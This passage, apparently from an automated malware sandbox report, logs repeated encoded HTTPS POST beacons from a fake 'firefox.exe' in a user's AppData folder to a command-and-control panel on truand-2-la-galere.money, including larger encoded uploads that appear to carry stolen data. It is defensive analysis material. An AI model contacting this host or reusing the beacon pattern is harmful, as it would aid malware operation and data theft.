Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:40 UTC 511 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:40 UTC 511 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:40 UTC 511 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID Source IP Source Port Destination IP Destination Port Process

19 192.168.1.81 49184 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:41 UTC 511 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:41 UTC 511 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:41 UTC 511 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:41 UTC 511 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID Source IP Source Port Destination IP Destination Port Process

2 192.168.1.81 49165 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:49:59 UTC 505 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 0
Cache-Control: no-cache

2018-05-07 12:49:59 UTC 505 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:49:59 UTC 506 IN Data Raw: 32 38 0d 0a 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 0d 0a 30 0d 0a 0d 0a Data Ascii: 289ec9be34fd447911df7464ecd88bd89434f6c10c0

Session ID Source IP Source Port Destination IP Destination Port Process

20 192.168.1.81 49185 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:42 UTC 511 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:42 UTC 511 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P


2018-05-07 12:50:43 UTC 511 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:43 UTC 511 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0


Session ID Source IP Source Port Destination IP Destination Port Process

21 192.168.1.81 49186 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:44 UTC 511 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:44 UTC 512 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:44 UTC 512 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:44 UTC 512 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID Source IP Source Port Destination IP Destination Port Process

22 192.168.1.81 49187 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:45 UTC 512 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:45 UTC 512 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:45 UTC 512 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:45 UTC 512 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID Source IP Source Port Destination IP Destination Port Process

23 192.168.1.81 49188 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:46 UTC 512 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:46 UTC 512 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:47 UTC 512 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:47 UTC 512 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID Source IP Source Port Destination IP Destination Port Process

24 192.168.1.81 49189 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe


Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:47 UTC  512  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:50:47 UTC  512  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:48 UTC  512  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:00 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:48 UTC  513  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 25, Source: 192.168.1.81:49190, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:49 UTC  513  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:50:49 UTC  513  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:50 UTC  513  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:02 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:50 UTC  513  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 26, Source: 192.168.1.81:49191, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:50 UTC  513  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:50:50 UTC  513  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:51 UTC  513  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:03 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:51 UTC  513  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 27, Source: 192.168.1.81:49192, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:51 UTC  513  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:50:51 UTC  513  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:52 UTC  513  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:04 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:52 UTC  513  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0


Session ID: 28, Source: 192.168.1.81:49193, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:53 UTC  513  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:50:53 UTC  514  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:53 UTC  514  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:05 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:53 UTC  514  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 29, Source: 192.168.1.81:49194, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:54 UTC  514  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:50:54 UTC  514  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:55 UTC  514  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:07 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:55 UTC  514  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 3, Source: 192.168.1.81:49167, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:01 UTC  506  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 458 | Cache-Control: no-cache

2018-05-07 12:50:01 UTC 506 OUT Data Raw: 4a 0a 05 4d 1e 57 4f 1a 15 0b 58 14 72 5d 58 45 0b 14 17 05 18 05 4b 53 4a 09 35 68 25 5c 56 56 56 14 20 5a 02 42 58 43 69 09 02 40 07 17 13 05 50 44 75 57 43 50 47 54 3c 6b 3d 75 52 5b 07 06 44 7e 54 03 17 50 19 64 5f 55 1f 53 11 11 01 55 19 2b 33 78 32 2c 3e 3e 21 0b 5b 53 5b 5c 11 72 0c 14 58 59 53 39 6f 2e 0b 42 51 0e 08 59 19 72 5a 46 03 50 0c 49 10 57 0a 4b 53 17 53 45 1b 4c 5e 52 14 51 59 14 64 62 4d 6b 3d 79 59 4e 0c 0f 08 59 18 2f 05 51 57 40 56 5a 07 58 00 54 10 30 5c 17 15 50 01 00 3e 3e 2b 0d 57 46 58 4a 5e 57 10 46 78 52 50 5d 06 06 44 70 57 0f 01 18 58 5a 57 14 24 43 10 58 5e 06 4a 16 43 0b 52 54 03 39 6c 2e 55 42 56 19 09 11 31 16 53 55 42 51 45 57 54 35 32 21 0b 55 49 55 47 5d 04 5f 0f 58 44 1a 19 35 02 5a 09 45 55 5b 14 44 40 5c 52 19 03 Data Ascii: JMWOXr]XEKSJ5h%\VVV ZBXCi@PDuWCPGT<k=uR[D~TPd_USU+3x2,>>![S[\rXYS9o.BQYrZFPIWKSSEL RQYdbMk=yYNY/QW@VZXT0\P>>+WFXJ WFxRP]DpWXZW$CX JCRT9l.UBV1SUBQEWT52!UIUG]_XD5ZEU[D@\R

2018-05-07 12:50:01 UTC  506  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:50:14 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:01 UTC  506  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 30, Source: 192.168.1.81:49195, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:56 UTC  514  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache


2018-05-07 12:50:56 UTC  514  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:57 UTC  514  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:09 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:57 UTC  514  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0


Session ID: 31, Source: 192.168.1.81:49196, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:58 UTC  514  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:50:58 UTC  514  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:59 UTC  514  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:11 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:59 UTC  515  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 32, Source: 192.168.1.81:49197, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:00 UTC  515  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:00 UTC  515  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:01 UTC  515  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:13 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:01 UTC  515  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 33, Source: 192.168.1.81:49198, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:02 UTC  515  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:02 UTC  515  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:03 UTC  515  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:15 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:03 UTC  515  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 34, Source: 192.168.1.81:49199, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe


Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:05 UTC  515  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:05 UTC  515  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:05 UTC  515  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:17 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:05 UTC  516  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 35, Source: 192.168.1.81:49200, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:06 UTC  516  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:06 UTC  516  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:07 UTC  516  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:19 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:07 UTC  516  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 36, Source: 192.168.1.81:49201, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:08 UTC  516  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:08 UTC  516  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:09 UTC  516  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:21 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:09 UTC  516  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 37, Source: 192.168.1.81:49202, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:09 UTC  516  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:09 UTC  516  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:10 UTC  516  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:22 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:10 UTC  516  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0


Session ID: 38, Source: 192.168.1.81:49203, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:11 UTC  516  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:11 UTC  517  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:11 UTC  517  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:24 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:11 UTC  517  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 39, Source: 192.168.1.81:49204, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:12 UTC  517  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:12 UTC  517  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:12 UTC  517  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:25 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:12 UTC  517  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 4, Source: 192.168.1.81:49168, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:18 UTC  506  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 35 | Cache-Control: no-cache
2018-05-07 12:50:18 UTC  507  OUT  Data Raw: 50 0b 05 56 1e 53 4f 05 1a 55 48 04 4b 00 02 07 5d 56 02 48 5a 41 0e 06 10 59 41 0e 0b 4a 45 04 4f 01 56  Data Ascii: PVSOUHK]VHZAYAJEOV
2018-05-07 12:50:19 UTC  507  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:50:31 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:19 UTC  507  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 40, Source: 192.168.1.81:49205, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:13 UTC  517  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:13 UTC  517  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:13 UTC  517  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:26 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close


2018-05-07 12:51:13 UTC  517  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0


Session ID: 41, Source: 192.168.1.81:49206, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:15 UTC  517  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:15 UTC  517  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:15 UTC  517  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:28 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:15 UTC  518  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 42, Source: 192.168.1.81:49207, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:16 UTC  518  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:16 UTC  518  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:16 UTC  518  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:28 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:16 UTC  518  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 43, Source: 192.168.1.81:49208, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:17 UTC  518  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:17 UTC  518  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:17 UTC  518  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:30 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:17 UTC  518  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 44, Source: 192.168.1.81:49209, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:18 UTC  518  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache


2018-05-07 12:51:18 UTC  518  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:19 UTC  518  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:31 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:19 UTC  518  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0


Session ID: 45, Source: 192.168.1.81:49210, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:20 UTC  518  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:20 UTC  519  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:20 UTC  519  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:32 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:20 UTC  519  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 46, Source: 192.168.1.81:49211, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:21 UTC  519  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:21 UTC  519  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:21 UTC  519  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:34 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:21 UTC  519  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 47, Source: 192.168.1.81:49212, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:22 UTC  519  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:22 UTC  519  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:22 UTC  519  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:35 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:22 UTC  519  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 48, Source: 192.168.1.81:49213, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe


Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:23 UTC  519  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:23 UTC  519  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:24 UTC  519  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:36 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:24 UTC  520  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 49, Source: 192.168.1.81:49214, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
